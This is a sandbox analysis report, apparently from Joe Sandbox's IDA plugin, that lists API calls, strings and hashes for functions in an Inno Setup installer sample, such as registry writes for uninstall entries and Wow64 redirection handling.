                                                                                      • Instruction ID: efef7a00cc11a416bc55dd6669f4c7d8ef89bbc17b889cc882c0d169e59b9d03
                                                                                      • Opcode Fuzzy Hash: b8508960964e18f228b5b6a455ee562c9244d5bac447fc9a6e43c63091bc2de7
                                                                                      • Instruction Fuzzy Hash: A63113756012489FCB50EB65C981BDE77B9AF44304F5084B6A448AB3A2D738AF818B58
                                                                                      APIs
                                                                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,0044813D), ref: 00448080
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00448101
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressLibraryLoadProc
                                                                                      • String ID:
                                                                                      • API String ID: 2574300362-0
                                                                                      • Opcode ID: d9787b66ae215e656ee415771d480fc3d32ddb8ef1add214a3308f413d75a1a6
                                                                                      • Instruction ID: 5c6eebc632780948e30306f747c70913dfebb380d33768fd88d962b889412947
                                                                                      • Opcode Fuzzy Hash: d9787b66ae215e656ee415771d480fc3d32ddb8ef1add214a3308f413d75a1a6
                                                                                      • Instruction Fuzzy Hash: CD515170A00105AFDB00EFA5C481AAFB7F9EB54315F10817FE814BB392DB389E458B99
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,004516CB,?,?,-00000001,00000000), ref: 004516A5
                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,004516CB,?,?,-00000001,00000000), ref: 004516AD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileFindFirstLast
                                                                                      • String ID:
                                                                                      • API String ID: 873889042-0
                                                                                      • Opcode ID: 2ccb38690e6aaf115f3138c94c71e4fbb344a9e4605e64161c765321e8b078e6
                                                                                      • Instruction ID: 1035efb27f9b4b466a521b4d59d966f000d53702a43f221aaee312fb08fd4d5a
                                                                                      • Opcode Fuzzy Hash: 2ccb38690e6aaf115f3138c94c71e4fbb344a9e4605e64161c765321e8b078e6
                                                                                      • Instruction Fuzzy Hash: 9EF04931A00304BB8B10EB769C5159EB7ECDB4532571046BBFC14D32A2DA784D048458
                                                                                      APIs
                                                                                      • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,004964C0,00000001,?,0040859B,?,00000000,0040867A), ref: 004084EE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLocale
                                                                                      • String ID:
                                                                                      • API String ID: 2299586839-0
                                                                                      • Opcode ID: db4c94cdf382ee3399fd393310c0d3b07f3e4771964ce669c16d021a31866df8
                                                                                      • Instruction ID: 1ce02aaae6ec4ade8b295bae84213e8e13784b7c216e354617812bc232f4da8b
                                                                                      • Opcode Fuzzy Hash: db4c94cdf382ee3399fd393310c0d3b07f3e4771964ce669c16d021a31866df8
                                                                                      • Instruction Fuzzy Hash: 59E0D87170021467D711E95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE4046ED
                                                                                      APIs
                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?,?,004240C1,?,00000000,004240CC), ref: 00423B1E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: NtdllProc_Window
                                                                                      • String ID:
                                                                                      • API String ID: 4255912815-0
                                                                                      • Opcode ID: f78a68ed826797f4bf69a42243cc74bd686c7ff48922d06499da9bfac42a5011
                                                                                      • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                                      • Opcode Fuzzy Hash: f78a68ed826797f4bf69a42243cc74bd686c7ff48922d06499da9bfac42a5011
                                                                                      • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameUser
                                                                                      • String ID:
                                                                                      • API String ID: 2645101109-0
                                                                                      • Opcode ID: e5c4147ce8d30c90c427c53b97d0de2aa7d796d22412cffb07543fa3924af9c1
                                                                                      • Instruction ID: 1680b636b72d7d7da35d26ad3489112d7b5719c0f4c6eb10b1da13dd6a5c5f2b
                                                                                      • Opcode Fuzzy Hash: e5c4147ce8d30c90c427c53b97d0de2aa7d796d22412cffb07543fa3924af9c1
                                                                                      • Instruction Fuzzy Hash: CAD0C2B260420053C300AEA9AC82697769C8B84316F10483F7C85CA3C3E67CDB4C569A
                                                                                      APIs
                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042EF10
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: NtdllProc_Window
                                                                                      • String ID:
                                                                                      • API String ID: 4255912815-0
                                                                                      • Opcode ID: 526567439b164cf8a1cedbeebbc24c6bfdc41ebf56c0565ee429dfc079ee367e
                                                                                      • Instruction ID: 914d3360e1f6a3e7d3a1e305f80b88d129d6a01b97e8a9d2bd08e0dbdb8f1123
                                                                                      • Opcode Fuzzy Hash: 526567439b164cf8a1cedbeebbc24c6bfdc41ebf56c0565ee429dfc079ee367e
                                                                                      • Instruction Fuzzy Hash: 16D0A77120010C7FCB00DE99D940C6F33AC9B88700BA0C805F508C7205C734EC1087B4

Control-flow Graph: rendered graph omitted (legend: Executed / Not Executed); function starting at 0046AF80.
APIs
  • Part of subcall function 0046AD6C: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,?,00497154,?,0046B06F,?,00000000,0046B4F7,?,_is1), ref: 0046AD8F
• RegCloseKey.ADVAPI32(?,0046B4FE,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046B549,?,?,00000001,00497154), ref: 0046B4F1
Strings
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: CloseValue
• String ID: " /SILENT$5.3.5 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
• API String ID: 3132538880-4162757603
• Opcode ID: 74ada5f7f4b3b84f6d30dbb7f605c502c19f4e02ec6191c5605d87bebef11242
• Instruction ID: 6b8bd6052d7011f0313b6456d796e8b41d00091cb6ba677f30044cb60bcfab9c
• Opcode Fuzzy Hash: 74ada5f7f4b3b84f6d30dbb7f605c502c19f4e02ec6191c5605d87bebef11242
• Instruction Fuzzy Hash: DBF14374A001099BCB14EB55D8819AEB7B9EB44304F60C07BEC11AB7A5EB7CBD41CB5E

Control-flow Graph: rendered graph omitted (legend: Executed / Not Executed); function starting at 0048CEA0.
APIs
• Sleep.KERNEL32(00000000,00000000,0048D395,?,?,?,?,00000000,00000000,00000000), ref: 0048CEE0
• FindWindowA.USER32(00000000,00000000), ref: 0048CF11
Strings
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: FindSleepWindow
• String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
• API String ID: 3078808852-3310373309
• Opcode ID: fab8a4fe477002bc53f13639ab52b518f0439af39f0fe01b7890694e2865f2f1
• Instruction ID: b0d844213b24b695988cfb35ecebf8c704e926cd3cc1ee44f2907765548c277e
• Opcode Fuzzy Hash: fab8a4fe477002bc53f13639ab52b518f0439af39f0fe01b7890694e2865f2f1
• Instruction Fuzzy Hash: 36C161A0B0461067D714BE3E9C4261E569A9F89704B11D93FB406EB7CACE7DDC06439E

Control-flow Graph: rendered graph omitted (legend: Executed / Not Executed); function starting at 0047E1E8.
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0047E1F9
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0047E206
• GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0047E214
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0047E21C
• GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 0047E228
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 0047E249
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 0047E25C
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0047E262
• GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0047E279
Strings
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
• String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
• API String ID: 2230631259-2623177817
• Opcode ID: 4e477b3967b851c9eac5dc78f32453af4a94d1867c0ed92fe90c0839294704c9
• Instruction ID: 2d47f8cf15d4e27fa0f1176fe36efced94cd1240a4270aaae3bb705869ea135a
• Opcode Fuzzy Hash: 4e477b3967b851c9eac5dc78f32453af4a94d1867c0ed92fe90c0839294704c9
• Instruction Fuzzy Hash: 6E11B155104741A4DA1073B79D45FEB164C8B09718F188BFB6C8CA62D3D67CC84996BF

Control-flow Graph: rendered graph omitted (legend: Executed / Not Executed); function starting at 00465560.
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegCloseKey.ADVAPI32(?,0046577A,?,?,00000001,00000000,00000000,00465795,?,00000000,00000000,?), ref: 00465763
                                                                                      Strings
                                                                                      • Inno Setup: App Path, xrefs: 00465622
                                                                                      • Inno Setup: Icon Group, xrefs: 0046563E
                                                                                      • Inno Setup: Selected Components, xrefs: 00465682
                                                                                      • Inno Setup: Setup Type, xrefs: 00465672
                                                                                      • Inno Setup: Deselected Tasks, xrefs: 004656F1
                                                                                      • Inno Setup: User Info: Organization, xrefs: 00465732
                                                                                      • Inno Setup: Deselected Components, xrefs: 004656A4
                                                                                      • Inno Setup: No Icons, xrefs: 0046564B
                                                                                      • Inno Setup: User Info: Name, xrefs: 0046571F
                                                                                      • %s\%s_is1, xrefs: 004655DD
                                                                                      • Inno Setup: User Info: Serial, xrefs: 00465745
                                                                                      • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 004655BF
                                                                                      • Inno Setup: Selected Tasks, xrefs: 004656CF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpen
                                                                                      • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                      • API String ID: 47109696-1093091907
                                                                                      • Opcode ID: 94c9d62fb1d7e435db0e42792cab2a1aa0121b794f6c09036552146ff74fe873
                                                                                      • Instruction ID: 8cdb4376706b2a9b24b9b35df1ecfc56159c4b319484bfede528e66c14f5fdf6
                                                                                      • Opcode Fuzzy Hash: 94c9d62fb1d7e435db0e42792cab2a1aa0121b794f6c09036552146ff74fe873
                                                                                      • Instruction Fuzzy Hash: 4951B630A00B04DBCB11EB65D951BDEBBF5EF84304F5084BAE845A7391E738AE05CB59

                                                                                      Control-flow Graph (graph image not reproduced; entry block 4237e4)
                                                                                      APIs
                                                                                        • Part of subcall function 0041F334: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED14,?,004237FF,00423B7C,0041ED14), ref: 0041F352
                                                                                      • GetClassInfoA.USER32(00400000,004235EC), ref: 0042380F
                                                                                      • RegisterClassA.USER32(00494630), ref: 00423827
                                                                                      • GetSystemMetrics.USER32(00000000), ref: 00423849
                                                                                      • GetSystemMetrics.USER32(00000001), ref: 00423858
                                                                                      • SetWindowLongA.USER32(004105C0,000000FC,004235FC), ref: 004238B4
                                                                                      • SendMessageA.USER32(004105C0,00000080,00000001,00000000), ref: 004238D5
                                                                                      • GetSystemMenu.USER32(004105C0,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C,0041ED14), ref: 004238E0
                                                                                      • DeleteMenu.USER32(00000000,0000F030,00000000,004105C0,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C,0041ED14), ref: 004238EF
                                                                                      • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,004105C0,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 004238FC
                                                                                      • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,004105C0,00000000,00000000,00400000,00000000,00000000,00000000), ref: 00423912
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                      • String ID: 5B
                                                                                      • API String ID: 183575631-3738334870
                                                                                      • Opcode ID: e5b5147e0e34996107640ab488c5a955b3283bc40e3e9afea641ea9dff5fb6f0
                                                                                      • Instruction ID: 4eea79998965153292ad411f177aff7c9d901da1d54039d3c3496ec011b6d66c
                                                                                      • Opcode Fuzzy Hash: e5b5147e0e34996107640ab488c5a955b3283bc40e3e9afea641ea9dff5fb6f0
                                                                                      • Instruction Fuzzy Hash: C53161B17402106AEB10AF65EC82F6A36989715709F11017BBA41AF2D7C67DED04876C

                                                                                      Control-flow Graph (graph image not reproduced; entry block 477ecc)
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(6E380000,SHGetFolderPathA), ref: 00477FCE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$] I$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                      • API String ID: 190572456-953201679
                                                                                      • Opcode ID: 39e346f91b0b191ca7c9d4b76c1215527ff936a439ab04cc6e1b4ee361ca35d9
                                                                                      • Instruction ID: be8cea5b208f70f3497dc675e9b67cc11d28b3b7ca4846f22d5268085fe32373
                                                                                      • Opcode Fuzzy Hash: 39e346f91b0b191ca7c9d4b76c1215527ff936a439ab04cc6e1b4ee361ca35d9
                                                                                      • Instruction Fuzzy Hash: D5312530A04249DBCB00EB95D9859DEB7B4EB54308F51C87BE508E7351DB789E08CBAD

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00477D13,?,?,00000000,00496628,00000000,00000000,?,00492BF5,00000000,00492D9E,?,00000000), ref: 00477C33
                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,00477D13,?,?,00000000,00496628,00000000,00000000,?,00492BF5,00000000,00492D9E,?,00000000), ref: 00477C3C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup$e1I$o1I
                                                                                      • API String ID: 1375471231-477672290
                                                                                      • Opcode ID: 4c75ab1de06e94221e890cf111cb2a76886db217d149b9edc6180f5924f9a91e
                                                                                      • Instruction ID: 656792ce42a3b8ee986284f240f9f7d4df8ffa0b35947b5a09b08d7327d2a589
                                                                                      • Opcode Fuzzy Hash: 4c75ab1de06e94221e890cf111cb2a76886db217d149b9edc6180f5924f9a91e
                                                                                      • Instruction Fuzzy Hash: 89412674A042099FCB11EF95D882ADEB7B5EF48309F50857BE81477392D738AE05CB58

                                                                                      Control-flow Graph (graph image not reproduced; entry block 42ef34)
                                                                                      APIs
                                                                                      • GetActiveWindow.USER32 ref: 0042EF63
                                                                                      • GetFocus.USER32 ref: 0042EF6B
                                                                                      • RegisterClassA.USER32(004947AC), ref: 0042EF8C
                                                                                      • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F060,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042EFCA
                                                                                      • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F010
                                                                                      • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F021
                                                                                      • SetFocus.USER32(00000000,00000000,0042F043,?,?,?,00000001,00000000,?,00456ACA,00000000,00496628), ref: 0042F028
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                      • String ID: (fI$TWindowDisabler-Window
                                                                                      • API String ID: 3167913817-2792019125
                                                                                      • Opcode ID: 8c16546f9a585749c763ac640097901552d234e7c9639c2d0d67cc4ae301c64c
                                                                                      • Instruction ID: 77e24118650528b8c543fe6d0d23e90f8f7024fb04e3d66e63b834f41b798fd0
                                                                                      • Opcode Fuzzy Hash: 8c16546f9a585749c763ac640097901552d234e7c9639c2d0d67cc4ae301c64c
                                                                                      • Instruction Fuzzy Hash: 35219571740710BAE220EF62DD02F1A76A4EB05B04FA2453BF604BB2D2D7BC6D54C6AD

                                                                                      Control-flow Graph (graph image not reproduced; entry block 451df8)
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451E91,?,?,?,?,00000000,?,00493224), ref: 00451E18
                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451E1E
                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451E91,?,?,?,?,00000000,?,00493224), ref: 00451E32
                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451E38
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                      • API String ID: 1646373207-2130885113
                                                                                      • Opcode ID: dad4633167d2715cc0ebda844063a592ad4074400e663550045590e6248a3f3e
                                                                                      • Instruction ID: bff3e1d123b44789eb661b74cfa9bb81be17ee1d1842bcd010c9e5766072ccdb
                                                                                      • Opcode Fuzzy Hash: dad4633167d2715cc0ebda844063a592ad4074400e663550045590e6248a3f3e
